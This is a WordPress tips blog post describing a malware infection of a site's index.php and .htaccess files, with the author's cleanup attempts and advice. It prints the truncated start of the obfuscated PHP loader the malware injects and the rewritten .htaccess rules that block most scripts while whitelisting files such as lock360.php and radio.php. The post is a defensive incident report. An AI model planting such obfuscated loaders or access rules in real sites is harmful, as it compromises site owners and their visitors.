🚀 Is building a website too difficult? Let me guide you step by step—Learn about the 「Naibabiji WordPress Website Building Coaching Service」 →
🔍 Click here to search this site
Experience & Tips Sharing

A Case of WordPress Website .htaccess File Virus Infection

📅 June 1, 2021
👤 Lee
⏱️ Reading time: 1 minute
🔄 Last Updated: June 1, 2021
Today, I encountered a rather potent virus that automatically infects files like index.php and .htaccess in the website directory. After infection, the website becomes inaccessible. The other impacts are unclear. Here, I'll document the virus analysis and solution.   Details of the virus:First, a large chunk of encrypted code is inserted into the index.php file:
<php
$O_O_O_0O00=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$O0_0O__0OO=$O_O_O_0O00[44].$O_O_O_0O00[53].$O_O_O_0O00[31].$O_O_O_0O00[65].$O_O_O_0O00[10].$O_O_O_0O00[53].$O_O_O_0O00[31].$O_O_O_0O00[44].$O_O_O_0O00[39].$O_O_O_0O00[21].$O_O_O_0O00[56].$O_O_O_0O00[31].$O_O_O_0O00[10].$O_O_O_0O00[56].$O_O_O_0O00[21
Then, the .htaccess file is consistently altered to look like the following:
<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
This virus-infected website was using cPanel Shared Hosting. Strangely, even after deleting all files in the root directory and refreshing, the virus files would regenerate automatically. The reason is unknown, so I directly switched to a new server for installation, and everything returned to normal. According to information found on the official WordPress forums, this virus started appearing several months ago, but there's no definitive solution. Fortunately, this virus does not infect the database, so reinstalling WordPress can eliminate it (possibly requiring a server OS reinstall or switching to a different server). Additionally, there's an online method I haven't tested: first, stop the PHP process, then delete the infected files, and finally restart PHP. You can give it a try.

🚀 Still feeling confused after reading the tutorial? Let me guide you step-by-step.

「Naibabiji WordPress Website Building Coaching Service」—From choosing a domain and buying hosting, to installing a Theme and publishing content, I「ll coach you through every step, helping you avoid detours and reach your goal directly.

👉 Learn about the Website Building Coaching Service
🔒

Comments are closed

The comment function for this article is closed. If you have any questions, please feel free to contact us through other channels.

×
二维码

Scan QR Code to Follow

AI Website Building Assistant

🤖
Hello! I am the Naibabiji AI Assistant. How can I help you?
Quick Consultation:
In-depth Tools:
🎯 SEO Planning Tool 🖼️ Website template